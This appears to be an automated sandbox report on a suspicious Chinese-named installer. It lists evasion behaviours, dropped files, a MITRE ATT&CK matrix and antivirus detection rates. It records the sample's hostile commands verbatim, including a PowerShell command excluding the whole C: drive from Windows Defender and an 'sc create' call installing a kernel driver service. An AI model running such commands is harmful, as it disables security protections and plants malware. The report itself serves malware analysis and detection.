Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6956Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2804Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpWindow / User API: threadDelayed 590Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpWindow / User API: threadDelayed 591Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpWindow / User API: threadDelayed 573Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbcJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeDropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-Q5IJ4.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeAPI coverage: 7.4 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5544Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC2E090 FindFirstFileA,FindClose,FindClose,6_2_6CC2E090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_006D6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_006D7496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006D9C60 GetSystemInfo,10_2_006D9C60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, 00000001.00000002.1822805498.000000000106D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to hide a thread from the debugger
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CAB3886 NtSetInformationThread 00000000,00000011,00000000,000000006_2_6CAB3886
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC43871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC43871
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_007557D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,10_2_007557D0
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC4D456 mov eax, dword ptr fs:[00000030h]6_2_6CC4D456
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC4D425 mov eax, dword ptr fs:[00000030h]6_2_6CC4D425
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC4286D mov eax, dword ptr fs:[00000030h]6_2_6CC4286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC43871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6CC43871
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CC3C3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6CC3C3AD

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"Jump to behavior
Found driver which could be used to inject code into processes
Source: tProtect.dll.12.drStatic PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-NF2T5.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe "C:\Users\user\Desktop\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe" /VERYSILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= autoJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoarJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmpCode function: 6_2_6CD0A700 cpuid 6_2_6CD0A700
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_006DAB2A GetSystemTimeAsFileTime,10_2_006DAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00770090 GetVersion,10_2_00770090
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
Windows Service		1
Access Token Manipulation		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Windows Service		1
Disable or Modify Tools		LSASS Memory431
Security Software Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution		Logon Script (Windows)111
Process Injection		231
Virtualization/Sandbox Evasion		Security Account Manager231
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API		Login Hook1
DLL Side-Loading		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information		Cached Domain Credentials2
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing		Proc Filesystem25
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1580553 Sample: #U5b89#U88c5#U7a0b#U5e8f_1.... Startdate: 25/12/2024 Architecture: WINDOWS Score: 96 90 Multi AV Scanner detection for dropped file 2->90 92 Multi AV Scanner detection for submitted file 2->92 94 Found driver which could be used to inject code into processes 2->94 96 3 other signatures 2->96 10 #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 30 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 26 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vbc, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe 2 19->35         started        38 powershell.exe 23 19->38         started        51 2 other processes 23->51 41 conhost.exe 25->41         started        43 conhost.exe 27->43         started        45 conhost.exe 29->45         started        47 conhost.exe 31->47         started        49 conhost.exe 33->49         started        53 25 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp 4 15 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vbc, PE32 55->78 dropped 80 C:\Program Files (x86)\Windows NT\hrsw.vbc, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 55->82 dropped 84 C:\Program Files (x86)\Windows NT\7zr.exe, PE32 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 7 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe5%ReversingLabsWin32.Ransomware.Generic
#U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe11%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\7zr.exe0%VirustotalBrowse
C:\Program Files (x86)\Windows NT\hrsw.vbc26%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc38%VirustotalBrowse
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll6%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-8E4J0.tmp\#U5b89#U88c5#U7a0b#U5e8f_1.1.6.tmp1%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-DNFUF.tmp\update.vbc26%ReversingLabs
